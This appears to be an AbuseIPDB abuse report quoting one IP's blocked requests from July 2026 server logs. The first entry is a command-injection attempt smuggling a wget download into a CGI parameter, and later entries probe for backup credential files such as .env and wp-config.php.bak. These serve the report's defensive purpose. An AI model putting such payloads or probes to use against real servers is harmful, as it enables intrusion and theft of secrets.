Web application exploit probing
From server logs:
2026-07-05 19:46:29 (direkt-IP) POST /cgi-bin/o ...
show moreWeb application exploit probing
From server logs:
2026-07-05 19:46:29 (direkt-IP) POST /cgi-bin/operator/servetest?cmd=ntp&ServerName=%24%28wget%20http%3A%2F%2F31 [400 Bad Request]
show less
Web application exploit probing
From server logs:
DIRECT_IP_HTTPS ip=[attacker] time=05/Jul/2026:20 ...
show moreWeb application exploit probing
From server logs:
DIRECT_IP_HTTPS ip=[attacker] time=05/Jul/2026:20:21:53 +0200
2026-07-05 20:21:53 (direkt-IP) GET /.env.backup HTTP/1.1 [444 Blockerad]
UA: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
2026-07-05 20:21:53 (direkt-IP) GET /.env.save HTTP/1.1 [444 Blockerad]
UA: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/124.0.0.0 Safari/537.36
show less
Direct IP probe / invalid SNI
From server logs:
DIRECT_IP_HTTPS ip=[attacker] time=05/Jul/2026:20:5 ...
show moreDirect IP probe / invalid SNI
From server logs:
DIRECT_IP_HTTPS ip=[attacker] time=05/Jul/2026:20:57:57 +0200
DIRECT_IP_HTTPS ip=[attacker] time=05/Jul/2026:20:58:08 +0200
DIRECT_IP_HTTPS ip=[attacker] time=05/Jul/2026:20:58:18 +0200
DIRECT_IP_HTTPS ip=[attacker] time=05/Jul/2026:20:58:29 +0200
show less
Direct IP probe / invalid SNI
From server logs:
DIRECT_IP_HTTPS ip=[attacker] time=05/Jul/2026:21:5 ...
show moreDirect IP probe / invalid SNI
From server logs:
DIRECT_IP_HTTPS ip=[attacker] time=05/Jul/2026:21:50:13 +0200
DIRECT_IP_HTTPS ip=[attacker] time=05/Jul/2026:21:50:13 +0200
DIRECT_IP_HTTPS ip=[attacker] time=05/Jul/2026:21:50:13 +0200
DIRECT_IP_HTTPS ip=[attacker] time=05/Jul/2026:21:50:13 +0200
DIRECT_IP_HTTPS ip=[attacker] time=05/Jul/2026:21:50:13 +0200
show less
Web application exploit probing
From server logs:
2026-07-05 21:51:07 [domain] GET /wp-config.php ...
show moreWeb application exploit probing
From server logs:
2026-07-05 21:51:07 [domain] GET /wp-config.php.bak HTTP/1.1 [444 Blockerad]
UA: Python-urllib/2.7
show less
Web application exploit probing
From server logs:
2026-07-05 22:12:40 [domain] GET /wp-admin/ HTT ...
show moreWeb application exploit probing
From server logs:
2026-07-05 22:12:40 [domain] GET /wp-admin/ HTTP/1.1 [444 Blockerad]
UA: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7; rv:118.0) Gecko/20100101 Firefox/118.0
show less
Web application exploit probing
From server logs:
2026-07-05 22:54:05 (direkt-IP) GET / HTTP/1.1 ...
show moreWeb application exploit probing
From server logs:
2026-07-05 22:54:05 (direkt-IP) GET / HTTP/1.1 [444 Blockerad]
show less
Web application exploit probing
From server logs:
2026-07-05 22:54:06 (direkt-IP) GET / HTTP/1.1 ...
show moreWeb application exploit probing
From server logs:
2026-07-05 22:54:06 (direkt-IP) GET / HTTP/1.1 [444 Blockerad]
show less
Web application exploit probing
From server logs:
2026-07-05 22:54:10 (direkt-IP) GET /version HT ...
show moreWeb application exploit probing
From server logs:
2026-07-05 22:54:10 (direkt-IP) GET /version HTTP/1.1 [444 Blockerad]
show less
Web application exploit probing
From server logs:
2026-07-05 22:54:25 (direkt-IP) GET / HTTP/1.1 ...
show moreWeb application exploit probing
From server logs:
2026-07-05 22:54:25 (direkt-IP) GET / HTTP/1.1 [444 Blockerad]
show less
Web application exploit probing
From server logs:
2026-07-05 22:54:26 (direkt-IP) GET /v1 HTTP/1. ...
show moreWeb application exploit probing
From server logs:
2026-07-05 22:54:26 (direkt-IP) GET /v1 HTTP/1.1 [444 Blockerad]
show less
Web application exploit probing
From server logs:
2026-07-05 22:54:27 (direkt-IP) G�0~��� [40 ...
show moreWeb application exploit probing
From server logs:
2026-07-05 22:54:27 (direkt-IP) G�0~��� [400 Bad Request]
show less
Web application exploit probing
From server logs:
2026-07-05 22:54:45 (direkt-IP) GET / HTTP/1.1 ...
show moreWeb application exploit probing
From server logs:
2026-07-05 22:54:45 (direkt-IP) GET / HTTP/1.1 [444 Blockerad]
UA: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
show less
Web application exploit probing
From server logs:
2026-07-05 22:54:57 (direkt-IP) GET / HTTP/1.1 ...
show moreWeb application exploit probing
From server logs:
2026-07-05 22:54:57 (direkt-IP) GET / HTTP/1.1 [444 Blockerad]
UA: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
show less
Web application exploit probing
From server logs:
2026-07-05 22:55:40 (direkt-IP) GET / HTTP/1.1 ...
show moreWeb application exploit probing
From server logs:
2026-07-05 22:55:40 (direkt-IP) GET / HTTP/1.1 [444 Blockerad]
UA: Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36
show less
Web application exploit probing
From server logs:
2026-07-05 23:01:36 (direkt-IP) CONNECT google. ...
show moreWeb application exploit probing
From server logs:
2026-07-05 23:01:36 (direkt-IP) CONNECT google.com:443 HTTP/1.1 [400 Bad Request]
show less
Web application exploit probing
From server logs:
2026-07-05 23:17:41 (direkt-IP) GET / HTTP/1.1 ...
show moreWeb application exploit probing
From server logs:
2026-07-05 23:17:41 (direkt-IP) GET / HTTP/1.1 [444 Blockerad]
UA: Mozilla/5.0 (compatible; InternetMeasurement/1.0; +https://internet-measurement.com/)
AS14061 redan bannat
show less
Web application exploit probing
From server logs:
2026-07-05 23:17:57 (direkt-IP) GET / HTTP/1.0 ...
show moreWeb application exploit probing
From server logs:
2026-07-05 23:17:57 (direkt-IP) GET / HTTP/1.0 [444 Blockerad]
show less
Web application exploit probing
From server logs:
2026-07-05 23:21:11 (direkt-IP) H�� [40 ...
show moreWeb application exploit probing
From server logs:
2026-07-05 23:21:11 (direkt-IP) H�� [400 Bad Request]
AS14061 redan bannat
show less
Web App Attack
By clicking “Accept all”, you agree to the storing of cookies on your device to remember preferences and
analyze site usage.
Read more
- Required to log into your AbuseIPDB account, and store these cookie preferences.